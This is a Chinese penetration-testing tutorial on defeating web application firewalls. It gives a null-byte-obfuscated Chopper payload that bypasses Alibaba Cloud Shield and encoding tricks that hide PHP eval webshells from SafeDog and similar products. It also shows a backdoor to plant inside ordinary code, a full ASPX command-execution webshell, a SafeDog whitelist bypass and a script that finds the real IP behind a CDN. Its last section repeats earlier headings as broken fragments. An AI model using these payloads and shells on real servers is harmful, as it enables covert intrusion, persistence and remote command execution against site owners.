WAF Bypass 技术详解（Misc篇）<\/h1>

0x00 前言<\/h2>
本文主要介绍几种实用的WAF绕过技术，包括菜刀连接拦截绕过、Webshell免杀、禁止执行程序绕过以及CDN查找原IP的方法。<\/p>

0x01 Bypass 菜刀连接拦截<\/h2>

阿里云盾绕过案例<\/h3>

原始拦截数据<\/strong>：<\/p>

@eval(base64_decode($_POST[z0]));
<\/code><\/pre>
<\/li>

绕过方法<\/strong>：<\/p>

在eval函数名后插入空字符%00<\/code>或%01<\/code><\/li>
在左括号前插入空字符<\/li>
对base64内容进行分段处理，在特定位置插入空字符<\/li>
<\/ul>
<\/li>

最终绕过payload<\/strong>：<\/p>
a<\/span>=@<\/span>eval<\/span>%<\/span>00<\/span>(base64_decode<\/span>%<\/span>00<\/span>($_POST[z0<\/span>]));&<\/span>z0<\/span>=<\/span>QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMC<\/span>%<\/span>01<\/span>IpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0<\/span>%<\/span>01<\/span>%<\/span>2<\/span>BfCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJbIlBBVEhfVFJBTlNMQVRFRCJdKTskUj0ieyREfVx0IjtpZihzdWJzdHIoJEQsMCwxKSE9Ii8iKXtmb3JlYWNoKHJhbmdlKCJBIiwiWiIpIGFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9JFIuPSJcdCI7JHU9KGZ1bmN0aW9uX2V4aXN0cygncG9zaXhfZ2V0ZWdpZCcpKT9AcG9zaXhfZ2V0cHd1aWQoQHBvc2l4X2dldGV1aWQoKSk6Jyc7JHVzcj0oJHUpPyR1WyduYW1lJ106QGdldF9jdXJyZW50X3VzZXIoKTskUi49cGhwX3VuYW1lKCk7JFIuPSIoeyR1c3J9KSI7cHJpbnQgJFI7O2VjaG8oInw8LSIpO2RpZSgpOw<\/span>==<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
360主机卫士绕过案例<\/h3>
在eval函数前面插入任意URL编码的字符即可绕过拦截。<\/p>
0x02 Webshell免杀技术<\/h2>
使用mb_convert_encoding函数绕过<\/h3>


基本原理<\/strong>：<\/p>

利用编码转换函数混淆恶意代码<\/li>
主机防护软件通常不会拦截编码转换函数<\/li>
<\/ul>
<\/li>

示例代码<\/strong>：<\/p>
$str =<\/span> base64_decode<\/span>("cGhwaW5mbygpOw=="<\/span>);
<\/span><\/span>$str1 =<\/span> mb_convert_encoding<\/span>($str, "GBK"<\/span>);
<\/span><\/span>@<\/span>eval<\/span>($str1);
<\/span><\/span><\/code><\/pre><\/li>

绕过效果<\/strong>：<\/p>

可绕过安全狗、主机卫士、云锁等防护软件<\/li>
<\/ul>
<\/li>
<\/ol>
其他推荐方案<\/h3>


利用404页面<\/strong>：<\/p>

在正常程序中多次调用GET\/POST\/Cookie的代码里插入后门<\/li>
示例：
\/\/$a=$_POST['a'];
<\/span><\/span><\/span>\/\/$b=$_POST['b'];
<\/span><\/span><\/span><\/span>$a($b);  \/\/ a=assert&b=phpinfo()
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>

利用ADS流<\/strong>：<\/p>

使用NTFS备用数据流隐藏Webshell<\/li>
<\/ul>
<\/li>

利用.user.ini<\/strong>：<\/p>

通过修改.user.ini文件实现后门植入<\/li>
<\/ul>
<\/li>
<\/ol>
0x03 Bypass 禁止执行程序<\/h2>
安全狗白名单绕过<\/h3>


安全狗白名单程序示例<\/strong>：<\/p>
%windows%Microsoft.NET\/Framework\/v1.1.4322\/aspnet_wp.exe
%windows%Microsoft.NET\/Framework\/v1.1.4322\/csc.exe
%windows%Microsoft.NET\/Framework\/v1.1.4322\/vbc.exe
...
<\/code><\/pre>
<\/li>

绕过方法一：利用白名单程序作为参数<\/strong><\/p>
StartInfo.Arguments = @"\/'C:\/Windows\/Microsoft.NET\/Framework\/v1.1.4322\/vbc.exe' "<\/span> + argm.Value;
<\/span><\/span><\/code><\/pre><\/li>

绕过方法二：利用Windows文件名特性<\/strong><\/p>

上传名为vsjitdebugger.exee<\/code>的cmd程序<\/li>
利用安全狗不完全匹配的特性绕过<\/li>
<\/ul>
<\/li>
<\/ol>
执行CMD小马示例<\/h3>
<%@<\/span> Page Language="C#"<\/span> Debug="true"<\/span> Trace="false"<\/span> %>
<\/span><\/span><%@<\/span> Import Namespace="System.Diagnostics"<\/span> %>
<\/span><\/span><script Language="c#"<\/span> runat="server"<\/span>>
<\/span><\/span>protected<\/span> void<\/span> FbhN(object<\/span> sender,EventArgs e){
<\/span><\/span>    try<\/span>{
<\/span><\/span>        Process ahAE=new<\/span> Process();
<\/span><\/span>        ahAE.StartInfo.FileName=path.Value;
<\/span><\/span>        ahAE.StartInfo.Arguments=argm.Value;
<\/span><\/span>        ahAE.StartInfo.UseShellExecute=false<\/span>;
<\/span><\/span>        ahAE.StartInfo.RedirectStandardInput=true<\/span>;
<\/span><\/span>        ahAE.StartInfo.RedirectStandardOutput=true<\/span>;
<\/span><\/span>        ahAE.StartInfo.RedirectStandardError=true<\/span>;
<\/span><\/span>        ahAE.Start();
<\/span><\/span>        string<\/span> Uoc=ahAE.StandardOutput.ReadToEnd();
<\/span><\/span>        Uoc=Uoc.Replace("\r\n"<\/span>,"<br>"<\/span>);
<\/span><\/span>        tnQRF.Visible=true<\/span>;
<\/span><\/span>        tnQRF.InnerHtml="<hr width=\"100%\" noshade\/><pre>"<\/span>+Uoc+"<\/pre>"<\/span>;
<\/span><\/span>    }catch<\/span>(Exception error){
<\/span><\/span>        Response.Write(error.Message);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/script>
<\/span><\/span><\/code><\/pre>0x04 Bypass CDN查找原IP<\/h2>
方法一：使用国外多地Ping<\/h3>

收集偏门国家的DNS服务器<\/li>
使用nslookup查询目标域名<\/li>
比较不同DNS返回的结果<\/li>
<\/ol>
自动化脚本实现<\/h3>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span># -*- encoding: utf-8 -*-<\/span>
<\/span><\/span>import<\/span> re
<\/span><\/span>import<\/span> sys
<\/span><\/span>import<\/span> time
<\/span><\/span>import<\/span> threading
<\/span><\/span>import<\/span> dns.resolver
<\/span><\/span>
<\/span><\/span>class<\/span> Bypass_CDN<\/span>:
<\/span><\/span>    def<\/span> __init__(self,domain,dns_dict):
<\/span><\/span>        self.<\/span>domain =<\/span> domain
<\/span><\/span>        self.<\/span>myResolver =<\/span> dns.<\/span>resolver.<\/span>Resolver()
<\/span><\/span>        self.<\/span>dns_list =<\/span> set([d.<\/span>strip() for<\/span> d in<\/span> open(dns_dict)])
<\/span><\/span>        self.<\/span>good_dns_list,self.<\/span>result_ip =<\/span> set(),set()
<\/span><\/span>    
<\/span><\/span>    def<\/span> test_dns_server<\/span>(self,server):
<\/span><\/span>        self.<\/span>myResolver.<\/span>lifetime =<\/span> self.<\/span>myResolver.<\/span>timeout =<\/span> 2.0<\/span>
<\/span><\/span>        try<\/span>:
<\/span><\/span>            self.<\/span>myResolver.<\/span>nameservers =<\/span> [server]
<\/span><\/span>            answer =<\/span> self.<\/span>myResolver.<\/span>query('google-public-dns-a.google.com'<\/span>)
<\/span><\/span>            if<\/span> answer[0<\/span>].<\/span>address ==<\/span> '8.8.8.8'<\/span>:
<\/span><\/span>                self.<\/span>good_dns_list.<\/span>add(server)
<\/span><\/span>        except<\/span>: pass<\/span>
<\/span><\/span>    
<\/span><\/span>    def<\/span> load_dns_server<\/span>(self):
<\/span><\/span>        threads =<\/span> []
<\/span><\/span>        for<\/span> i in<\/span> self.<\/span>dns_list:
<\/span><\/span>            threads.<\/span>append(threading.<\/span>Thread(target=<\/span>self.<\/span>test_dns_server,args=<\/span>(i,)))
<\/span><\/span>        for<\/span> t in<\/span> threads: t.<\/span>start()
<\/span><\/span>        while<\/span> True<\/span>:
<\/span><\/span>            if<\/span> len(threading.<\/span>enumerate()) <<\/span> len(self.<\/span>dns_list) \/<\/span> 2<\/span>: break<\/span>
<\/span><\/span>            else<\/span>: time.<\/span>sleep(1<\/span>)
<\/span><\/span>        for<\/span> j in<\/span> threads: j.<\/span>join()
<\/span><\/span>    
<\/span><\/span>    def<\/span> ip<\/span>(self,dns_server):
<\/span><\/span>        self.<\/span>myResolver.<\/span>nameservers =<\/span> [dns_server]
<\/span><\/span>        try<\/span>:
<\/span><\/span>            result =<\/span> self.<\/span>myResolver.<\/span>query(self.<\/span>domain)
<\/span><\/span>            for<\/span> i in<\/span> result: self.<\/span>result_ip.<\/span>add(str(i.<\/span>address))
<\/span><\/span>        except<\/span>: pass<\/span>
<\/span><\/span>    
<\/span><\/span>    def<\/span> run<\/span>(self):
<\/span><\/span>        self.<\/span>load_dns_server()
<\/span><\/span>        threads =<\/span> []
<\/span><\/span>        for<\/span> i in<\/span> self.<\/span>good_dns_list:
<\/span><\/span>            threads.<\/span>append(threading.<\/span>Thread(target=<\/span>self.<\/span>ip,args=<\/span>(i,)))
<\/span><\/span>        for<\/span> t in<\/span> threads: t.<\/span>start()
<\/span><\/span>        while<\/span> True<\/span>:
<\/span><\/span>            if<\/span> len(threading.<\/span>enumerate()) <<\/span> len(self.<\/span>good_dns_list) \/<\/span> 2<\/span>: break<\/span>
<\/span><\/span>            else<\/span>: time.<\/span>sleep(1<\/span>)
<\/span><\/span>        for<\/span> j in<\/span> threads: j.<\/span>join()
<\/span><\/span>        for<\/span> i in<\/span> self.<\/span>result_ip: print i
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    dns_dict =<\/span> 'foreign_dns_servers.txt'<\/span>
<\/span><\/span>    bypass =<\/span> Bypass_CDN(sys.<\/span>argv[1<\/span>],dns_dict)
<\/span><\/span>    bypass.<\/span>run()
<\/span><\/span><\/code><\/pre>其他方法<\/h3>


DNS历史记录查询<\/strong>：<\/p>

使用Rapid7的DNS解析记录库检索历史记录<\/li>
检查NS\/TXT\/MX记录<\/li>
<\/ul>
<\/li>

服务器主动连接<\/strong>：<\/p>

上传图片等资源让服务器主动连接你的服务器<\/li>
检查访问日志获取真实IP<\/li>
<\/ul>
<\/li>

邮件服务器探测<\/strong>：<\/p>

通过注册等方式让目标发送邮件<\/li>
检查邮件头获取邮件服务器IP<\/li>
扫描邮件服务器所在网段<\/li>
<\/ul>
<\/li>
<\/ol>
0x05 总结<\/h2>
本文介绍了多种实用的WAF绕过技术，包括：<\/p>

通过插入特殊字符绕过菜刀连接拦截<\/li>
利用编码转换函数实现Webshell免杀<\/li>
利用白名单和Windows特性绕过程序执行限制<\/li>
多种方法查找CDN背后的真实IP<\/li>
<\/ol>
这些技术在实际渗透测试中具有很高的实用价值，但请注意应在合法授权范围内使用。<\/p>

WAF Bypass 技术详解（Misc篇）<\/h1>

0x00 前言<\/h2> 本文主要介绍几种实用的WAF绕过技术，包括菜刀连接拦截绕过、Webshell免杀、禁止执行程序绕过以及CDN查找原IP的方法。<\/p>

0x01 Bypass 菜刀连接拦截<\/h2>

360主机卫士绕过案例<\/h3> 在eval函数前面插入任意URL编码的字符即可绕过拦截。<\/p>

0x02 Webshell免杀技术<\/h2>

0x03 Bypass 禁止执行程序<\/h2>

0x04 Bypass CDN查找原IP<\/h2>

0x00 前言<\/h2>
本文主要介绍几种实用的WAF绕过技术，包括菜刀连接拦截绕过、Webshell免杀、禁止执行程序绕过以及CDN查找原IP的方法。<\/p>

360主机卫士绕过案例<\/h3>
在eval函数前面插入任意URL编码的字符即可绕过拦截。<\/p>